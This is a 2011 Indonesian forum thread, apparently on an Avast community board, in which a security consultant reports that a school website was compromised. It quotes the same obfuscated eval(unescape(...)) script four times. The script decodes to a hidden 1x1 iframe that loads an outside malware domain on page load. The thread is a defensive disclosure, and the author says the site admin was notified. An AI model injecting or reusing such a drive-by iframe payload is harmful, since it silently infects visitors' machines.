« previous next »
Pages: [1]   Go Down

Author Topic: SMAN 1 Kota Ternate - Website terinfeksi  (Read 7212 times)

0 Members and 1 Guest are viewing this topic.

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1371
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
SMAN 1 Kota Ternate - Website terinfeksi
« on: May 16, 2011, 08:45:56 AM »
Dear All,

Siang hari ini, saya melakukan web scanning terhadap salah satu website sekolahan yang dimana telah terinfeksi dan terinjeksi sejenis javascript malware di beberapa link diantaranya :

MW:IFRAME:HD28
Quote
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%61%74%74%77%77%2E%63%6F%6D%2F%3F%39%31%34%32%38%35%39%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

MW:IFRAME:HD28 (Bagian index.php)
Quote
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%61%74%74%77%77%2E%63%6F%6D%2F%3F%39%31%34%32%38%35%39%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --

MW:IFRAME:HD28 (Bagian index.php?id=fasil
Quote
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%61%74%74%77%77%2E%63%6F%6D%2F%3F%39%31%34%32%38%35%39%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --

MW:IFRAME:HD28 (Bagian index.php?id=berita&kode=6)
Quote
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%61%74%74%77%77%2E%63%6F%6D%2F%3F%39%31%34%32%38%35%39%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --

Pada website ini ditemukan oleh Google Diagnostic sebanyak 28 malicious software (malware) yang sedang di download pada saat website terbuka oleh korban tanpa disadari oleh korban.

Sumber informasi :
http://sitecheck.sucuri.net/scanner/?scan=sman1ternate.sch.id
http://www.unmaskparasites.com/security-report/
http://vscan.urlvoid.com/analysis/9623f9f371d1dc146e2a55baeb355d10/aW5kZXgtcGhw/
http://www.google.com/safebrowsing/diagnostic?site=sman1ternate.sch.id/

Semoga dari sisi atau pihak sekolah dapat memperbaikinya untuk script-script yang telah di rubah oleh cracker.

Semoga bermanfaat,

cheers,



Logged
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya

Offline Cahya Legawa

  • Sr. Member
  • ****
  • Posts: 393
  • Oh, here we are again.
    • Website
Re: SMAN 1 Kota Ternate - Website terinfeksi
« Reply #1 on: May 21, 2011, 10:30:52 AM »
Apa tidak ada cara untuk menginformasikannya langsung pada pengelola ya  ???
Logged
Avast Security Premium - Windows 10, Android, iPadOS. | Avast One Free - Windows 11

Offline Yanto.Chiang

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1371
  • Soli Deo Gloria
    • PT Garuda Sinatriya Globalindo
Re: SMAN 1 Kota Ternate - Website terinfeksi
« Reply #2 on: May 31, 2011, 06:10:27 AM »
Quote from: Cahya on May 21, 2011, 10:30:52 AM
Apa tidak ada cara untuk menginformasikannya langsung pada pengelola ya  ???

Hi Cahya,

Sudah kami laporkan ke web adminnya langsung, dan tujuan sharing disini adalah sharing knowledge dan informasi untuk menghindari user lain terinfeksi dan juga untuk menghindari administrator lainnya diserang hal serupa.

cheers,
Logged
Yanto Chiang | IT Security Consultants | AVAST Premium Security | GarudaSinatriya
Pages: [1]   Go Up
« previous next »